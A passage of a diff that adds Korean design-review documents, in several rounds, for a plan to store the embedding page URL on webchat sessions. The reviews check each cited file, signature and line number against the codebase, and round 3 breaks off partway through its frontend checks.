+`main.yaml`의 `post.requestBody`에 `required: [widget_id]`만 있고 `page_url`은 `required`에 없는 형태로 추가하는 설계는 기존 계약을 깨지 않는 optional 필드 추가로 적절하다. 다만 §3 항목에서 지적한 서버측 강제 검증 부재를 감안하면, `maxLength: 2048`은 문서화된 계약일 뿐 실제로 강제되지 않는다는 점을 알고 진행해야 한다(§4.4/§5 수정 필요).
+
+## 7. 프라이버시/문서화
+
+- RST 문서(`webchat_struct_session.rst`) 갱신 필요성 판단은 정확하고 실재 파일 확인됨.
+- 프라이버시 논거(자사 페이지 URL이라 방문자 브라우징 히스토리를 노출하지 않는다는 논리)는 §3의 `location.href` 채택 근거와 정합적이며 합리적이다. 별다른 결함 없음.
+
+## 결론
+
+코드 인용 정확도, Peer/Local 기각 근거, referrer/location.href 선택 근거, 프라이버시/RST 판단은 모두 실제 소스로 검증되어 견고하다. 그러나:
+
+1. **§7 파일 목록이 `page_url`을 실제로 전달하는 데 필수적인 `bin-webchat-manager` 내부 RPC 수신 체인(`pkg/listenhandler/v1_sessions.go`, `pkg/listenhandler/models/request/v1_sessions.go`, `pkg/sessionhandler/main.go`+`mock_main.go`)과 `bin-common-handler/pkg/requesthandler/main.go`의 인터페이스 라인을 통째로 빠뜨렸다.** 이대로 구현하면 `page_url`이 RPC 요청 페이로드에서 파싱되지 않아 기능이 동작하지 않는다.
+2. **§5의 "오버사이즈 URL은 Gin 바인딩 계층에서 400으로 거부된다"는 주장이 실제로는 거짓이다.** 리포에 OpenAPI 요청 검증 미들웨어가 존재하지 않으므로, 명시적 길이 체크를 추가하거나 이 엣지케이스 서술 자체를 다시 써야 한다.
+
+두 가지 모두 "구현 시작 전에 반드시 고쳐야 하는" 수준의 실질적 결함이므로 승인할 수 없다.
+
+VERDICT: CHANGES_REQUESTED

--- a/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design-review-round1.md
+++ b/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design-review-round1.md
@@ -1,0 +1,65 @@
+# Review: 2026-07-22-webchat-session-page-url-referrer-design.md (Round 1)
+
+이 리뷰는 Round 0(`...review-round0.md`)에서 지적된 두 결함 — (A) §5의 "오버사이즈 URL은 Gin 바인딩 계층에서 400으로 거부된다"는 허위 주장, (B) §7 파일 목록에서 `bin-webchat-manager` 내부 RPC 수신 체인 누락 — 이 이번 개정판에서 실제로 해소되었는지를 코드로 직접 재검증한다.
+
+## 1. §4.4 신규 RPC 체인 목록의 완결성 재검증
+
+문서 §4.4가 나열한 체인을 실제 코드와 하나씩 대조했다:
+
+- `bin-api-manager/server/webchat_sessions.go` (`PostWebchatSessions`, 65-101행) — `c.BindJSON(&req)` 후 `h.serviceHandler.WebchatSessionCreate(c.Request.Context(), a, widgetID)` 호출. 문서 서술과 일치.
+- `bin-api-manager/pkg/servicehandler/main.go:906` — `WebchatSessionCreate(ctx context.Context, a *auth.AuthIdentity, widgetID uuid.UUID) (*wcsession.WebhookMessage, error)`. 문서 서술과 일치.
+- `bin-api-manager/pkg/servicehandler/webchat_session.go:138-214` — `WebchatSessionCreate` 구현, 205행에서 `h.reqHandler.WebchatV1SessionCreate(ctx, ownerCustomerID, widgetID)` 호출. 문서 서술과 일치.
+- `bin-common-handler/pkg/requesthandler/main.go:1536` — `WebchatV1SessionCreate(ctx context.Context, customerID uuid.UUID, widgetID uuid.UUID) (*wcsession.Session, error)`. 라인 번호까지 정확.
+- `bin-common-handler/pkg/requesthandler/webchat_session.go:17-23` — `WebchatV1SessionCreate`가 `&wcrequest.V1DataSessionsPost{CustomerID: customerID, WidgetID: widgetID}`만 구성. 문서가 "Round 1 신규 발견"으로 지목한 그대로, 현재 `PageURL` 필드가 없다. 확인됨.
+- `bin-webchat-manager/pkg/listenhandler/models/request/v1_sessions.go` — `V1DataSessionsPost{CustomerID uuid.UUID; WidgetID uuid.UUID}` (11-12행), `PageURL` 없음. 확인됨.
+- `bin-webchat-manager/pkg/listenhandler/v1_sessions.go:33` — `processV1SessionsPost`가 정확히 `h.sessionHandler.Create(ctx, req.CustomerID, req.WidgetID)`를 호출. 문서가 인용한 그대로.
+- `bin-webchat-manager/pkg/sessionhandler/main.go:21` — `SessionHandler` 인터페이스 `Create(ctx context.Context, customerID uuid.UUID, widgetID uuid.UUID) (*session.Session, error)`, `pageURL` 파라미터 없음. 확인됨. `//go:generate mockgen`(3행) 지시어도 실재하여, `mock_main.go` 재생성 필요성 서술이 타당함을 뒷받침한다.
+- `bin-webchat-manager/pkg/sessionhandler/create.go:29` — `Create(ctx, customerID, widgetID)` 시그니처, 문서 서술과 일치.
+
+체인 상의 추가 은닉 지점(캐시 계층)도 확인했다: `bin-webchat-manager/pkg/cachehandler`의 `SessionSet`/`SessionGet`은 `*session.Session` 포인터를 통째로 직렬화/역직렬화하며 필드별 리터럴 재구성을 하지 않으므로, `session.go`에 `PageURL` 필드만 추가되면 캐시 계층은 자동으로 이를 포함한다 — 문서가 캐시 계층을 별도로 언급하지 않은 것은 결함이 아니라 정확한 판단이다.
+
+**결론: §4.4가 나열한 체인은 실제 코드의 모든 중간 지점을 빠짐없이 커버한다. Round 0 지적 (B)는 실질적으로 해소되었다.**
+
+## 2. §7 파일 목록이 §4.4의 발견사항을 반영하는지
+
+§7 "bin-common-handler" 섹션에 `pkg/requesthandler/main.go`(1536행 명시), `pkg/requesthandler/webchat_session.go`, `pkg/requesthandler/mock_main.go` 3개가 추가되어 있고, "bin-webchat-manager" 섹션에 `pkg/listenhandler/models/request/v1_sessions.go`, `pkg/listenhandler/v1_sessions.go`, `pkg/sessionhandler/main.go`, `pkg/sessionhandler/mock_main.go` 4개가 추가되어 있다. §4.4에서 식별된 7개 신규 파일과 정확히 1:1 대응한다. 누락 없음.
+
+## 3. §5 수정된 길이 검증 주장의 타당성 — 새로운 결함 발견
+
+§5는 이제 "Gin 바인딩 계층에서 400 거부"라는 허위 주장을 버리고, `pkg/servicehandler/webchat_session.go`의 `WebchatSessionCreate`에 명시적 `validatePageURL` 체크를 추가하는 것으로 수정했다. 이 자체 방향은 타당하고, `bin-api-manager/server/webchat_sessions.go`가 정말 `c.BindJSON`만 호출한다는 Round 0의 관찰도 재확인했다(위 §1).
+
+그런데 §5는 이렇게 쓰고 있다:
+
+> "a private `validatePageURL(pageURL string) error` returning `serviceerrors`-wrapped error if `len(pageURL) > 2048` ... returning the existing `serviceerrors.ErrBadRequest`-style pattern rather than a new error type"
+
+`bin-api-manager/pkg/serviceerrors/sentinels.go`를 직접 읽어 확인한 결과, **`serviceerrors.ErrBadRequest`라는 심볼은 존재하지 않는다.** 해당 패키지의 실제 sentinel 목록은:
+
+```go
+ErrPermissionDenied, ErrNotFound, ErrAuthenticationRequired,
+ErrDirectAccessNotSupported, ErrInvalidArgument, ErrInternal,
+ErrIdentityVerificationRequired, ErrStateInvalid, ErrServiceUnavailable,
+ErrInsufficientBalance
+```
+
+`ErrBadRequest`는 `bin-common-handler/pkg/requesthandler` 패키지에 있는 별개의 심볼(백엔드가 bare 4xx status만 반환했을 때를 매핑하는 RPC 계층 sentinel, `server/error_translate.go:74`에서 사용)이며, `serviceerrors` 패키지 소속이 아니다. 문서가 참고 사례로 직접 지목한 `validateDelegateReason`(`pkg/servicehandler/auth_delegate.go:138-151`, §5가 "reject-don't-truncate precedent"의 근거로 인용한 바로 그 함수) 자체도 `serviceerrors.ErrBadRequest`가 아니라 `serviceerrors.ErrInvalidArgument`를 사용한다 (`auth_delegate.go:71`: `fmt.Errorf("%w: %v", serviceerrors.ErrInvalidArgument, err)`). 그리고 `ErrInvalidArgument`는 `server/error_translate.go:68-69`에서 400/`INVALID_ARGUMENT`로 매핑된다 — 즉 문서가 의도한 "400으로 거부" 동작 자체는 `ErrInvalidArgument`로 정확히 달성되지만, 문서에 적힌 심볼 이름 `ErrBadRequest`는 존재하지 않아 컴파일되지 않는다.
+
+이는 Round 0에서 지적된 (A)와 같은 계열의 결함(사실이 아닌 코드 근거로 구현 지침을 내림)이 정정된 절 안에서 형태를 바꿔 재발한 것이다. 심각도는 Round 0의 원 결함보다 낮다 — 구현자가 문서가 직접 인용한 `validateDelegateReason`의 실제 코드를 보면 즉시 `ErrInvalidArgument`가 맞는 심볼임을 알 수 있고, 이는 하나의 오탈자 수준 수정으로 해결된다. 그러나 "형식적 승인 금지"라는 이번 리뷰의 요구 수준에 비추어 이 부정확한 인용은 반드시 고쳐야 한다: §5의 `serviceerrors.ErrBadRequest`를 `serviceerrors.ErrInvalidArgument`로 정정할 것.
+
+## 4. Round 0에서 이미 검증된 항목 재확인 — 새로 깨진 부분 없음
+
+- **코드 인용 정확성**: `session.go`, `field.go`, `webhook.go`, `dbhandler/session.go`를 다시 읽었다. 이번 개정에서 이 파일들에 대한 문서 서술(§4.3)에 변경이 없고, 실제 코드도 Round 0 확인 시점과 동일하다 — `PageURL` 필드는 아직 추가되지 않은 설계 단계 그대로다. 문제 없음.
+- **Peer/Local 기각 근거(§6)**: `sessionhandler/create.go:77-78`의 `self`/`peer` 지역변수 재확인, 문서 서술과 일치. 변경 없음, 문제 없음.
+- **referrer 선택 근거(§3)**: `window.location.href` vs `document.referrer` 논리는 이번 라운드에서 수정되지 않았고, 재검토해도 여전히 타당하다.
+- **프라이버시(§4.6)**: 서술도 변경 없음, 논리적 결함 없음.
+- **iframe/scheme 엣지케이스(§5 나머지 항목)**: `LogoURL`의 `https://`만 허용 주석을 `bin-webchat-manager/models/widget/widget.go:99`에서 재확인(`// https URL only`) — §5가 대조 근거로 인용한 그대로. 문제 없음.
+
+## 5. 결론
+
+Round 0의 두 핵심 결함(A: 허위 400 검증 주장, B: RPC 체인 파일 누락) 중 **B는 완전히 해소**되었다 — §4.4/§7의 신규 체인 목록은 실제 코드의 모든 중간 파일을 정확히 커버한다. **A도 방향은 올바르게 수정**되었으나(명시적 servicehandler 레벨 길이 체크 도입 자체는 타당), 그 수정문 안에서 **존재하지 않는 심볼 `serviceerrors.ErrBadRequest`를 실제 검증 패턴인 것처럼 인용**하는 새로운 사실 오류가 발생했다. 문서가 직접 참고 사례로 지목한 `validateDelegateReason`이 실제로 사용하는 심볼은 `serviceerrors.ErrInvalidArgument`이다.
+
+이 오류는 Round 0의 원 결함들보다 훨씬 경미하고(구현자가 인용된 참고 함수 코드를 보면 즉시 바로잡을 수 있는 심볼명 오기), 설계의 방향성이나 RPC 체인 완결성 같은 구조적 문제는 아니다. 하지만 "코드 근거로 제시된 심볼이 실재하는가"는 이 리뷰 라운드의 핵심 검증 대상이었고, 실제로 실재하지 않는 것으로 확인되었으므로 정정 없이 승인할 수 없다.
+
+**요청 사항 (구현 착수 전 수정 필요):**
+1. §5에서 `serviceerrors.ErrBadRequest` → `serviceerrors.ErrInvalidArgument`로 정정 (validateDelegateReason이 실제로 사용하는 심볼과 일치시킬 것).
+
+VERDICT: CHANGES_REQUESTED

--- a/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design-review-round2.md
+++ b/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design-review-round2.md
@@ -1,0 +1,138 @@
+# Review: 2026-07-22-webchat-session-page-url-referrer-design.md (Round 2)
+
+이 리뷰는 Round 1(`...review-round1.md`)에서 지적된 유일한 결함 — §5가 인용한
+`serviceerrors.ErrBadRequest` 심볼이 실제로는 존재하지 않으며, `validateDelegateReason`이
+실제로 사용하는 심볼은 `serviceerrors.ErrInvalidArgument`라는 지적 — 이 이번 개정판에서
+해소되었는지, 그리고 문서 전체에 잔존/신규 결함이 없는지를 코드와 직접 대조해
+처음부터 끝까지 재검증한다.
+
+## 1. Round 1 지적사항의 해소 여부
+
+`bin-api-manager/pkg/serviceerrors/sentinels.go`를 다시 읽어 확인:
+
+```go
+ErrPermissionDenied, ErrNotFound, ErrAuthenticationRequired,
+ErrDirectAccessNotSupported, ErrInvalidArgument, ErrInternal,
+ErrIdentityVerificationRequired, ErrStateInvalid, ErrServiceUnavailable,
+ErrInsufficientBalance, ErrCaseClosed, ErrCaseDestinationNotAssociated,
+ErrCaseSourceNotOwned
+```
+
+`ErrBadRequest`는 여전히 존재하지 않는다(Round 1 확인과 동일). 문서 §5(287-304행,
+"**Round 2 correction:**" 단락)는 이제 다음과 같이 서술한다:
+
+> "confirmed against `bin-api-manager/pkg/serviceerrors/sentinels.go` that the correct
+> sentinel is `ErrInvalidArgument = stderrors.New("invalid argument")` ... an earlier
+> draft of this section incorrectly named a nonexistent `ErrBadRequest` symbol."
+
+`ErrInvalidArgument = stderrors.New("invalid argument")` 문구를 sentinels.go 19행과
+글자 그대로 대조 — 정확히 일치한다.
+
+문서가 근거로 재확인한 `auth_delegate.go`도 다시 읽었다:
+- 64-72행: `validateDelegateReason(reason)`가 에러를 반환하면
+  `fmt.Errorf("%w: %v", serviceerrors.ErrInvalidArgument, err)`로 래핑 — 문서가
+  "the caller-facing wrap at the `servicehandler` boundary is `ErrInvalidArgument`"라고
+  서술한 그대로. 라인 번호(§5는 "auth_delegate.go:138-151"을 `validateDelegateReason`
+  함수 자체의 위치로 인용)도 실제 함수 정의(137-151행, 0-index 보정 감안) 위치와 일치한다.
+- `validateDelegateReason` 함수 자체(138-151행)는 `fmt.Errorf`로 plain 에러만 반환하고
+  `serviceerrors` sentinel로 래핑하지 않는다는 §5의 서술("`auth_delegate.go`'s error
+  messages use plain `fmt.Errorf`, but the caller-facing wrap ... is `ErrInvalidArgument`")도
+  정확 — 래핑은 호출부(71행)에서 일어난다.
+
+`server/error_translate.go:68`에서 `ErrInvalidArgument`가 400으로 매핑됨을 재확인
+(`case stderrors.Is(err, serviceerrors.ErrInvalidArgument):`) — §5가 의도한 "400으로
+거부" 동작이 정정된 심볼로 실제로 달성됨을 뒷받침한다.
+
+**결론: Round 1의 유일한 지적사항은 완전히 해소되었다. 존재하지 않는 심볼 인용은
+남아있지 않다.**
+
+## 2. 문서 전체 재검증 (신규/잔존 결함 탐색)
+
+Round 0/Round 1에서 이미 검증되었고 이번 개정에서 서술이 바뀌지 않은 항목은
+코드 재확인만 하고 새로 나열하지 않는다(§3 referrer 선택 근거, §4.6 프라이버시,
+§6 Peer/Local 기각 근거, iframe/scheme 엣지케이스). 아래는 이번 라운드에서 처음부터
+끝까지 다시 짚은 항목이다.
+
+- **§4.1 client.js 인용**: `_doStart()`의 `POST /webchat_sessions` 호출부를
+  `webchat-widget-runtime/client.js:316-319`에서 재확인 — 현재 body는
+  `{ widget_id: this.resourceId }`만 담고 있으며, 문서가 제안하는 `page_url` 필드는
+  아직 추가되지 않은 설계 단계 그대로다(설계 문서이므로 당연히 미구현 상태). 문서가
+  인용한 라인 번호(315-319)도 실제 코드(315행 로그, 316-319행 fetch 호출)와 일치한다.
+- **§4.2 OpenAPI 인용**: `bin-openapi-manager/openapi/paths/webchat_sessions/main.yaml`을
+  전체 재확인 — `post:` 블록의 requestBody가 현재 `widget_id`만 정의하고 있음을
+  확인(36-51행), 문서가 새 필드로 추가하려는 `page_url`은 아직 없다. §7의
+  `bin-openapi-manager` 파일 목록(`openapi/paths/webchat_sessions/main.yaml`,
+  `openapi/openapi.yaml`)도 정확 — `openapi.yaml:2510`에 `WebchatManagerSession:`
+  스키마가 실재함을 확인했다(§7이 "WebchatManagerSession schema" 변경 대상으로 지목한
+  스키마).
+- **§4.3 backend 모델 인용**: `models/session/session.go`(19-28행 필드 목록),
+  `models/session/field.go`(6-22행), `models/session/webhook.go`(13-38행)를 모두
+  재확인 — 문서가 "PageURL 필드 없음" 전제로 서술한 그대로, 세 파일 모두 현재
+  `PageURL`/`FieldPageURL` 관련 내용이 전혀 없다. `dbhandler/session.go`에 대한
+  §4.3의 "no logic change expected -- PrepareFields/GetDBFields are struct-tag-driven"
+  주장도 재확인: `SessionCreate`(42행 `PrepareFields(s)`)와
+  `sessionGetFromDB`(102행 `GetDBFields(&session.Session{})`)가 정말로 구조체
+  전체를 리플렉션 기반으로 스캔하며, `PageURL` 같은 신규 필드가 struct tag만
+  갖추면 이 두 함수의 코드 변경 없이 자동으로 포함된다는 판단은 타당하다.
+- **§4.4 RPC 체인 재검증**: Round 1에서 검증된 7개 신규/변경 파일을 이번에도 코드
+  대 코드로 재대조했다.
+  - `requesthandler/webchat_session.go:16-23` — `WebchatV1SessionCreate`가
+    여전히 `customerID, widgetID uuid.UUID`만 받고 `&wcrequest.V1DataSessionsPost{
+    CustomerID: customerID, WidgetID: widgetID}`만 구성 (PageURL 없음). 문서 서술과 일치.
+  - `listenhandler/models/request/v1_sessions.go:10-13` — `V1DataSessionsPost{
+    CustomerID uuid.UUID; WidgetID uuid.UUID}`, PageURL 없음. 일치.
+  - `listenhandler/v1_sessions.go:33` — `processV1SessionsPost`가 정확히
+    `h.sessionHandler.Create(ctx, req.CustomerID, req.WidgetID)` 호출. 일치.
+  - `sessionhandler/main.go:20-26` — `SessionHandler` 인터페이스의 `Create(...)`
+    시그니처, pageURL 파라미터 없음. `//go:generate mockgen`(3행) 지시어 실재 확인.
+    일치.
+  - `requesthandler/main.go:1536` — `WebchatV1SessionCreate(ctx context.Context,
+    customerID uuid.UUID, widgetID uuid.UUID) (*wcsession.Session, error)`.
+    문서가 인용한 라인 번호까지 정확히 일치.
+  - `server/webchat_sessions.go:65-101`(`PostWebchatSessions`) — `c.BindJSON(&req)`
+    후 `h.serviceHandler.WebchatSessionCreate(c.Request.Context(), a, widgetID)` 호출
+    (93행). 문서 서술과 일치.
+  - `sessionhandler/create.go` — `Create()` 시그니처(29행)가 여전히
+    `(ctx context.Context, customerID uuid.UUID, widgetID uuid.UUID)`이고, 구조체
+    리터럴(40-48행)이 `WidgetID`/`Status`만 설정. 문서가 "stored on the
+    `session.Session{}` literal at construction (line 40-48)"이라 인용한 라인
+    번호와 정확히 일치.
+  누락된 중간 파일 없음. Round 0/1에서 지적된 결함(A, B)의 재발 징후 없음.
+- **§5 iframe/scheme 엣지케이스**: `widget.go:99`의 `LogoURL` 주석
+  (`// https URL only`)을 재확인 — §5가 "differs from `ThemeConfig.LogoURL`'s
+  existing `https://`-only validation"의 근거로 인용한 그대로.
+- **§6 Peer/Local 기각 근거**: `sessionhandler/create.go:77-78`의 `self`/`peer`
+  지역변수를 재확인 — `self := commonaddress.Address{Type: commonaddress.TypeWebchat,
+  Target: widgetID.String()}`, `peer := commonaddress.Address{Type:
+  commonaddress.TypeWebchat, Target: id.String()}`. 문서가 "Peer.Target would be
+  Session.ID itself", "Local.Target would be Widget.ID's string form"이라 서술한
+  그대로 — Peer는 `id`(세션 자기 자신의 PK), Local(self)은 `widgetID`(이미
+  `Session.WidgetID`로 저장되는 값)와 일치. 기각 논리에 결함 없음.
+- **§7 파일 목록 완결성**: monorepo-javascript 쪽 인용 파일도 실재 확인 —
+  `square-admin/src/webchat-widget-runtime/client.js`,
+  `square-admin/src/views/webchat_widgets/message_timeline.js`(§4.5가 서술한 대로
+  `session={selectedSession}` prop을 받아 트랜스크립트를 렌더링하는 구조 확인,
+  27행 `const WebchatMessageTimeline = ({ session, onOpenChange })`),
+  `square-admin/src/views/webchat_widgets/sessions_list.js`가 모두 실재.
+  bin-common-handler 섹션(`pkg/requesthandler/main.go`, `webchat_session.go`,
+  `mock_main.go`)과 bin-webchat-manager 섹션(`pkg/listenhandler/models/request/
+  v1_sessions.go`, `pkg/listenhandler/v1_sessions.go`, `pkg/sessionhandler/main.go`,
+  `pkg/sessionhandler/mock_main.go`)이 §4.4에서 식별된 7개 신규 파일과 여전히
+  1:1 대응한다. 누락 없음.
+- **환각 인용 전수 재점검**: 문서 전체에서 코드/라인 번호를 직접 인용하는 모든
+  지점(§4.1 client.js:315-319, §4.3 create.go:40-48, §4.4의 각 파일+라인,
+  §5 sentinels.go 인용, §5 widget.go:99, §6 create.go:77-78, §7의 openapi.yaml
+  `WebchatManagerSession` 스키마)을 하나씩 실제 코드와 대조했고, 모두 실재하며
+  서술과 일치한다. 새로 인용된 심볼/함수/파일 중 존재하지 않는 것은 없다.
+
+## 3. 결론
+
+Round 1의 유일한 결함(존재하지 않는 `serviceerrors.ErrBadRequest` 심볼 인용)은
+정확히 `serviceerrors.ErrInvalidArgument`로 정정되었고, 이 정정이 `sentinels.go`의
+실제 정의 및 `auth_delegate.go`의 실제 사용 패턴과 글자 그대로 일치함을 코드로
+확인했다. Round 0의 두 결함(허위 400 검증 주장, RPC 체인 파일 누락)도 이전 라운드에서
+해소된 상태가 이번 재검증에서도 유지되고 있다. 문서를 처음부터 끝까지 재점검한
+결과, §4.4 RPC 체인의 모든 중간 파일, §7 파일 목록, §5/§6의 코드 근거 인용 모두
+현재 코드베이스와 정확히 일치하며 새로운 사실 오류나 논리적 비약은 발견되지 않았다.
+
+VERDICT: APPROVED

--- a/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design-review-round3.md
+++ b/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design-review-round3.md
@@ -1,0 +1,178 @@
+# Review: 2026-07-22-webchat-session-page-url-referrer-design.md (Round 3)
+
+이 라운드는 문서에 변경사항이 없는 재검증이다(Round 2에서 이미 `APPROVED`). Round 0/1의
+지적사항 해소 여부, Round 2가 확인한 근거들을 신뢰하지 않고 처음부터 코드와 직접 대조했다.
+특히 지금까지 상대적으로 얕게 다뤄진 §1~§3(문제 정의/스코프), §4.5·§7의 프론트엔드
+(square-admin) 파일들, §4.6의 RST 문서, DB 마이그레이션 목록 완결성을 중점적으로 훑었다.
+
+## 1. Round 0/1/2 지적사항의 해소 상태 재확인
+
+- **Round 0 결함 A (§5 "Gin 바인딩 계층에서 400 거부" 허위 주장)**: 문서 현재본은 이미
+  "confirmed by reading `bin-api-manager/server/webchat_sessions.go`... none exists"로
+  정정되어 있다. `server/webchat_sessions.go:79-91`을 직접 읽어 재확인 — `PostWebchatSessions`는
+  `c.BindJSON(&req)`(80행) 후 `widgetID := uuid.FromStringOrNil(req.WidgetId)`(86행)만
+  검증하고, `page_url`/`maxLength` 관련 미들웨어는 전혀 없다. 리포 전체에서
+  `OapiRequestValidator`/`nethttp-middleware`/`gin-middleware` 패턴을 검색했으나
+  0건 — 문서의 정정된 서술과 일치. 결함 해소 유지됨.
+- **Round 0 결함 B (§7 RPC 체인 파일 누락)**: 문서 §4.4/§7이 지금 나열하는 7개 신규 파일
+  (`requesthandler/webchat_session.go`, `requesthandler/main.go`,
+  `requesthandler/mock_main.go`, `listenhandler/models/request/v1_sessions.go`,
+  `listenhandler/v1_sessions.go`, `sessionhandler/main.go`, `sessionhandler/mock_main.go`)을
+  모두 직접 열어 현재 시그니처를 재확인했다(§4 상세 참조). 전부 실재하고, 현재 시그니처가
+  전부 `pageURL` 파라미터 없이 `customerID, widgetID`만 받는 상태 그대로다 — 설계
+  문서이므로 미구현이 당연하고, 체인 자체는 완결적이다.
+- **Round 1 결함 (`serviceerrors.ErrBadRequest` 존재하지 않는 심볼)**:
+  `bin-api-manager/pkg/serviceerrors/sentinels.go`를 재확인 — `ErrBadRequest`는
+  여전히 존재하지 않는다. 문서 §5(287-304행)는 `ErrInvalidArgument =
+  stderrors.New("invalid argument")`(sentinels.go:19)를 정확히 인용하고 있고,
+  글자 그대로 일치한다. `auth_delegate.go:64-71`을 재확인 —
+  `validateDelegateReason(reason)`이 에러를 반환하면 71행에서
+  `fmt.Errorf("%w: %v", serviceerrors.ErrInvalidArgument, err)`로 래핑되는 것을 확인,
+  문서의 "the caller-facing wrap at the servicehandler boundary is ErrInvalidArgument"
+  서술과 정확히 일치. 결함 재발 없음.
+
+## 2. §1~§3 (문제 정의/스코프) — 이번 라운드 신규 검증
+
+- §1이 근거로 든 `models/session/session.go`에 페이지 URL 필드가 없다는 전제와
+  `webchat-widget-runtime/client.js`가 `document.referrer`/`window.location.href`를
+  전혀 읽지 않는다는 전제를 직접 확인: `session.go`(1-45행) 전체에 `PageURL`/URL
+  관련 필드 없음. `client.js` 전체(802행)를 `location`/`referrer` 키워드로 훑었으나
+  `_doStart()`(279-335행) 본문에 `window.location`/`document.referrer` 참조가
+  전혀 없다 — §1의 전제 정확.
+- §3의 "이 설계는 `page_url`만 캡처하고 `document.referrer`는 캡처하지 않는다"는
+  선택 논리(§3, 43-57행)는 순수 설계 판단이라 코드 검증 대상이 아니지만, 내적
+  일관성은 유지된다 — §4.1의 실제 구현 스니펫도 `window.location?.href`만 읽고
+  `document.referrer`는 참조하지 않아 §3과 일치.
+- §2 Non-goals의 "widget_id 자체도 세션 생성 시점에 한 번만 설정되고 갱신되지
+  않는다"는 비교 근거를 `sessionhandler/create.go`(29-48행)로 재확인 — `Create()`가
+  `WidgetID`를 구조체 리터럴 생성 시에만 설정하고, 이후 `SessionUpdate`
+  호출(101-107행)은 `FieldActiveflowID`만 갱신한다. `WidgetID`를 갱신하는
+  코드 경로는 리포 전체에 없음 — §2의 유비가 정확하다.
+
+## 3. §4.1 client.js — `_doStart()` 실제 라인 재확인
+
+`client.js:267-335`를 직접 읽었다:
+- `start()`(267-277행)는 `_startPromise` 캐싱 래퍼, 실제 본체는 `_doStart()`(279행 정의).
+- `POST /webchat_sessions` 호출은 315-319행(`this._log(...)`가 315행, `fetch` 호출이
+  316-319행) — 문서가 §4.1에서 "client.js:315-319"로 인용한 범위와 정확히 일치.
+  Round 2가 지적한 것과 동일하게 로그 줄(315)과 fetch 호출(316-319)이 섞여 있지만
+  이는 무해한 근사 인용이다.
+- 현재 body는 `{ widget_id: this.resourceId }`(318행)만 담고 있어 문서가 "아직
+  `page_url`이 없다"는 전제가 맞다.
+- **jsdom 가드에 대한 §4.1의 주석("the `typeof window !== 'undefined'` guard exists
+  only for this file's existing test harness")을 실제 테스트로 검증**:
+  `__tests__/client.test.js`(1-726행)를 훑었으나 `window`를 `undefined`로 만들거나
+  삭제하는 테스트 케이스는 없다(Jest의 기본 `testEnvironment: jsdom`에서
+  `window`는 항상 존재). 즉 문서 자신의 논거("a defensive check costs nothing")는
+  현재 테스트 스위트가 그 가드를 실제로 필요로 하지 않는다는 사실과 약간
+  어긋나지만, 문서 스스로도 "guard exists only... a defensive check costs nothing"
+  이라고 정확히 이 갭을 인정하고 있어 — 사실 오류가 아니라 방어적 코딩
+  선택이다. 결함 아님(§4.1 자체가 already self-aware).
+
+## 4. §4.2 OpenAPI, §4.3 백엔드 모델, §4.4 RPC 체인 — 전 파일 재확인
+
+- `bin-openapi-manager/openapi/paths/webchat_sessions/main.yaml`(41-55행): `requestBody`가
+  `widget_id`만 정의, `required: [widget_id]` — `page_url` 없음. §4.2의 전제와 일치.
+- `openapi.yaml:2510` `WebchatManagerSession:` 스키마 실재 확인.
+- `models/session/session.go`(16-29행), `field.go`(6-23행), `webhook.go`(13-38행) 모두
+  `PageURL`/`FieldPageURL` 없음 — §4.3의 "필드 없음" 전제 정확.
+- `pkg/dbhandler/session.go`의 `PrepareFields`/`GetDBFields` 사용(42행, 102행, 160행) —
+  구조체 태그 기반 리플렉션이 맞음, §4.3의 "no logic change expected" 판단 타당.
+- `scripts/database_scripts_test/sessions.sql`(1-22행) 실재, 현재 `page_url` 컬럼 없음 —
+  §4.3의 "SQLite 테스트 스키마에 컬럼 추가 필요" 판단과 일치. `bin-dbscheme-manager/
+  bin-manager/main/versions/`에 webchat 관련 기존 마이그레이션 4개(`webchat_widgets_*`,
+  `webchat_widgets_sessions_messages_*`)만 존재하고 `page_url` 컬럼 마이그레이션은
+  아직 없음 — §4.3/§7이 "새 Alembic revision 필요"라 서술한 그대로.
+- RPC 체인 7개 파일(§4.4) 전부 재확인:
+  - `requesthandler/webchat_session.go:16-23` — `WebchatV1SessionCreate(ctx, customerID,
+    widgetID uuid.UUID)`, `V1DataSessionsPost{CustomerID, WidgetID}`만 구성. PageURL 없음.
+  - `requesthandler/main.go:1536` — 인터페이스 시그니처, `pageURL` 없음. 라인 번호 정확.
+  - `listenhandler/models/request/v1_sessions.go:10-13` — `V1DataSessionsPost{CustomerID,
+    WidgetID}`만, `PageURL` 없음.
+  - `listenhandler/v1_sessions.go:33` — `processV1SessionsPost`가 정확히
+    `h.sessionHandler.Create(ctx, req.CustomerID, req.WidgetID)` 호출(파라미터 2개).
+  - `sessionhandler/main.go:21` — `Create(ctx, customerID, widgetID) (*session.Session, error)`,
+    `pageURL` 없음. 3행 `//go:generate mockgen` 지시어 실재.
+  - `sessionhandler/mock_main.go`, `requesthandler/mock_main.go` 둘 다 파일 실재 확인
+    (search_files로 존재 확인) — §7의 "mock 재생성 대상" 목록과 일치.
+  - `sessionhandler/create.go:29-48` — `Create()` 시그니처와 구조체 리터럴(40-48행)
+    `WidgetID`/`Status`만 설정, 문서가 인용한 라인 범위와 정확히 일치.
+  누락된 중간 파일 없음. Round 0가 지적했던 구멍은 재발하지 않았다.
+
+## 5. §4.5 square-admin 표시 로직 — 이번 라운드 집중 검증
+
+이전 라운드들이 상대적으로 얕게 다룬 구간이라 직접 코드를 열어 대조했다:
+
+- **`message_timeline.js`**: 27행 `const WebchatMessageTimeline = ({ session,
+  onOpenChange }) => {` — `session` prop을 받는 구조 확인. 현재는 `session.id`(32행),
+  `session.customer_id`(33행), `session.status`(96-98행)만 사용하고 `page_url`은
+  아직 참조하지 않는다 — 설계 단계이므로 당연하다. §4.5가 제안하는 "헤더 라인에
+  `page_url` 렌더링"은 이 컴포넌트의 실제 렌더 구조(85-143행, `DialogHeader`
+  다음에 메시지 리스트가 오는 흐름)에 자연스럽게 삽입 가능한 위치이며, 구조적
+  모순은 없다.
+- **`session={selectedSession}` 전달부**: `detail.js:97,850` —
+  `const [selectedSession, setSelectedSession] = useState(null)`(97행),
+  `<WebchatMessageTimeline session={selectedSession} onOpenChange={...} />`(850행).
